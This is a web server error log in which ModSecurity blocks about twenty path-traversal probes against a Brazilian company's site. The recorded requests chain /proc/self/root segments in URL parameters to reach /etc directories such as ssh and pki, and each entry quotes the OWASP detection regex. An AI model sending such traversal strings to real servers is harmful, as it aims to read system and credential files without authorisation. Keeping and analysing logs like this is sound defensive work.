[Tue Mar 17 10:37:14.615073 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:39790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZCpqmL8PQht4WJFlOMwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:15.887472 2026] [:error] [pid 1731:tid 140411666392832] [client 74.7.243.203:39796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZCwb2qCuy5irgBMjO4gAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:17.096277 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:39806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZDQeiSKl8TjouI-YIFwAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:19.424188 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.203:39820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZD6BJNF7axNlVR0UDiQAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:20.751630 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.243.203:45026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZEKt8Nd0UC_OcbVG1wQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:25.819961 2026] [:error] [pid 1731:tid 140411607643904] [client 74.7.243.203:45030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZFQb2qCuy5irgBMjO5wAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:28.103177 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.243.203:45040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZF6t8Nd0UC_OcbVG1wgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:29.958597 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.243.203:45056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZGat8Nd0UC_OcbVG1xQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:31.323182 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:58280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZG64xEDsg_V3ESNY53gAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:32.601608 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.243.203:58290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZHK4xEDsg_V3ESNY54QAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:36.057140 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:58300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZIDarLhPAjZGI1b20kgAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:37.350659 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.243.203:58310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZIat8Nd0UC_OcbVG1yQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:48.208407 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.243.203:58326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZLO82sZHvlq4xgHrJ0AAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:58.120960 2026] [:error] [pid 18709:tid 140411666392832] [client 74.7.243.203:50858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZNjarLhPAjZGI1b20oAAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:37:59.478382 2026] [:error] [pid 18709:tid 140411683178240] [client 74.7.243.203:45042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZNzarLhPAjZGI1b20ogAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:00.599024 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.243.203:42156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZOO82sZHvlq4xgHrJ0gAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:01.991870 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:42168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZOaBJNF7axNlVR0UDkQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:07.215423 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:42184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZP9CmCSWTlPouqorSogAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:08.579693 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.243.203:42186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZQJqmL8PQht4WJFlOPQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:38:09.002702 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.241.46:59728] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZQa4xEDsg_V3ESNY6BwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:38:09.899335 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:42194] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablZQa4xEDsg_V3ESNY6CAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
